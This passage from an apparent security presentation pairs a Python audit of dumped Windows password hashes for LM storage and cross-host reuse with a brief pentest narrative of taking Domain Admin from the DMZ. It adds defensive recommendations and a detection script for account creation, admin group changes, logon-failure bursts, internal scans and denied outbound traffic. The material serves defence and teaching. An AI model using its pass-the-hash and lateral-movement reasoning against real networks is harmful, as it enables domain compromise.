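              f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::"],
    "web02": [f"Administrator:500:{LM_PASSWORD}:{NT_PASSWORD}:::"],
    "web03": [f"Administrator:500:{EMPTY_LM}:{NT_PASSWORD}:::",
              f"svc_web:1002:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::"],
    "corp-dc": [f"Administrator:500:{EMPTY_LM}:{NT_PASSWORD}:::",
                f"svc_backup:1105:{EMPTY_LM}:fedcba9876543210fedcba9876543210:::"],
}
DOMAIN_CONTROLLERS = {"corp-dc"}  # hashes dumped here are domain accounts, not local ones


def parse_pwdump(line: str) -> dict:
    user, rid, lm, nt = line.split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def audit_credential_reuse(dumps: dict, domain_controllers: set) -> dict:
    """Three findings matching the deck's VULN 6/7, 8 and 10:
    lm_stored:      accounts whose LM hash is present, crackable in hours whatever the password is
    reuse:          NT hash -> accounts on more than one host (same hash = same password, so a hash
                    dumped on one host authenticates to the others with pass-the-hash, no cracking needed)
    domain_overlap: reused NT hashes that also belong to a domain account on a domain controller"""
    lm_stored, by_nt = [], defaultdict(list)
    for host, lines in dumps.items():
        for line in lines:
            entry = parse_pwdump(line)
            if entry["nt"] == EMPTY_NT:  # blank password / disabled account, nothing to reuse
                continue
            if entry["lm"] != EMPTY_LM:
                lm_stored.append((host, entry["user"]))
            by_nt[entry["nt"]].append((host, entry["user"]))
    reuse = {nt: accts for nt, accts in by_nt.items() if len({h for h, _ in accts}) > 1}
    domain_overlap = {nt: accts for nt, accts in reuse.items()
                      if any(h in domain_controllers for h, _ in accts)
                      and any(h not in domain_controllers for h, _ in accts)}
    return {"lm_stored": lm_stored, "reuse": reuse, "domain_overlap": domain_overlap}


if __name__ == "__main__":
    for finding, value in audit_credential_reuse(DUMPS, DOMAIN_CONTROLLERS).items():
        print(finding, value)
```

The same comparison works without cracking anything: identical NT hashes are enough to prove password reuse, which is also why pass-the-hash needs no cracking step. Running the audit on real dumps after a pentest, or on scheduled hash exports in a blue-team setting, turns VULN 8 and VULN 10 into findings before an attacker does.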
61. Penetration test example
I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the enterprise domain
(Diagram) Web Servers (ports 80 and 443) in the DMZ -> Intranet: Enterprise Windows Domain, Domain Controller, Internal Network
63. Conclusion
Cyber crime will continue to be a major threat for enterprises in the coming years
Computer vulnerabilities will continue to be discovered and will continue to affect enterprises
Legacy technologies such as standard AV are no longer sufficient to protect against cyber threats
Operational IT security programs must address security incident response and must address each of the following:
Awareness
Preventive security
Detective security
Corrective security
64. Conclusion
[Personal Statement] Be careful with the notion of Risk-Based Security based on asset classification
Should less critical systems be given less attention in terms of security?
What if a hacker can compromise a system in a non-critical zone and obtain credentials that are re-used in other zones? What if the enterprise does not have one Windows domain per risk domain?
Use risk-based security only if you have full IT isolation… and even then, is that enough?
Awareness
Educate all your employees about emerging cyber threats
Run real social-engineering exercises, sending undetected viruses to your employees
Be careful with the human reaction
Educate, but also protect the colleagues who get infected during the exercise
65. Conclusion
Preventive Security
Sandboxing technologies must be implemented alongside standard signature-based AV to protect against APTs
Implement NAC
Identify your vulnerabilities before the hackers do
Network security must be governed: network segmentation policies, firewall rule governance, flow and application control, inbound and outbound traffic policies..
Privileged account management
Isolation of network tiers
Use hardening best practices
E.g. remove admin rights from end users and from applications (least privilege)
Implement correct Windows security settings
66. Conclusion
Detective security
Real-time correlation of technical use cases has real added value
Monitor for account creation on any system
Monitor any “Domain Admin” privilege elevation
Monitor for internal scans
Monitor authentication failures
Monitor denied outbound traffic
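Added worked example (Python, written for this page, not from the original deck) of the five monitoring use cases above, run over constructed log lines that retrace the pentest: an account created on a web server and added to local Administrators, outbound connections denied at the firewall, a burst of failed logons from the compromised host, an SMB sweep of internal hosts and finally a member added to Domain Admins. The flat key=value format, the host names and addresses, and the thresholds (5 failures or 5 distinct targets within 60 seconds) are assumptions of this example; the Windows event IDs are the real ones.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in flat key=value form, the shape a SIEM normalises Windows security events and
# firewall logs into. Event IDs are the real Windows ones: 4720 user created, 4732 member added to a
# local group, 4728 member added to a global group, 4625 failed logon. Hosts and addresses are made up.
SAMPLE_LOG = [
    "2017-03-10T22:14:03Z host=WEB01 EventID=4720 TargetUser=temptest SubjectUser=WEB01$",
    "2017-03-10T22:14:05Z host=WEB01 EventID=4732 GroupName=Administrators MemberName=temptest",
    "2017-03-10T22:20:00Z host=FW01 type=fw action=DENY dir=out src=10.10.1.5 dst=198.51.100.7 dport=22",
    "2017-03-10T22:20:01Z host=FW01 type=fw action=DENY dir=out src=10.10.1.5 dst=198.51.100.7 dport=3389",
    "2017-03-10T22:20:02Z host=FW01 type=fw action=ALLOW dir=out src=10.10.1.5 dst=198.51.100.7 dport=443",
] + [  # six failed logons against WEB02 from the compromised web server within ten seconds
    f"2017-03-10T23:01:{10 + i:02d}Z host=WEB02 EventID=4625 TargetUser=Administrator IpAddress=10.10.1.5"
    for i in range(6)
] + [  # the same source touching SMB on six different internal hosts within six seconds
    f"2017-03-10T23:05:{i:02d}Z host=FW01 type=fw action=ALLOW dir=in src=10.10.1.5 dst=10.20.0.{i + 1} dport=445"
    for i in range(6)
] + ['2017-03-10T23:30:00Z host=CORP-DC EventID=4728 GroupName="Domain Admins" MemberName=temptest']

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
ADMIN_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}


def parse(line: str) -> dict:
    ts, rest = line.split(" ", 1)
    event = {k: v.strip('"') for k, v in KV.findall(rest)}
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect(lines, fail_threshold=5, scan_threshold=5, window=timedelta(seconds=60)) -> list:
    """Return (alert, host_or_source, detail) tuples for the five monitoring use cases."""
    alerts, fired = [], set()
    failures = defaultdict(deque)   # (host, source ip) -> timestamps of 4625 inside the window
    targets = defaultdict(deque)    # source ip -> (timestamp, destination) inside the window
    for line in lines:
        ev = parse(line)
        eid = ev.get("EventID")
        if eid == "4720":
            alerts.append(("account_created", ev["host"], ev["TargetUser"]))
        elif eid in {"4732", "4728", "4756"} and ev.get("GroupName") in ADMIN_GROUPS:
            kind = "local_admin_added" if ev["GroupName"] == "Administrators" else "domain_admin_added"
            alerts.append((kind, ev["host"], f'{ev["MemberName"]} -> {ev["GroupName"]}'))
        elif eid == "4625":
            key = (ev["host"], ev["IpAddress"])
            q = failures[key]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:     # slide the window; the newest entry always stays
                q.popleft()
            if len(q) >= fail_threshold and ("burst",) + key not in fired:
                fired.add(("burst",) + key)     # one alert per burst, not one per failure
                alerts.append(("auth_failure_burst", ev["host"], ev["IpAddress"]))
        elif ev.get("type") == "fw":
            if ev["action"] == "DENY" and ev["dir"] == "out":
                alerts.append(("denied_outbound", ev["src"], f'{ev["dst"]}:{ev["dport"]}'))
            q = targets[ev["src"]]
            q.append((ev["ts"], ev["dst"]))
            while ev["ts"] - q[0][0] > window:
                q.popleft()
            if len({dst for _, dst in q}) >= scan_threshold and ("scan", ev["src"]) not in fired:
                fired.add(("scan", ev["src"]))
                alerts.append(("internal_scan", ev["src"], f"{len(q)} hosts on port {ev['dport']}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Every step of the pentest narrative lights up at least one alert, and the first two (account creation and the local Administrators change on a DMZ web server) fire within seconds of the backdoor landing, long before the Domain Admins change. Tune the thresholds to the environment: the sliding-window counters are what keep failed-logon and scan detection from alerting on every single event.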
Corrective Security
Have emergency security procedures for containment defined and tested
Have a security incident response plan
Have a patching policy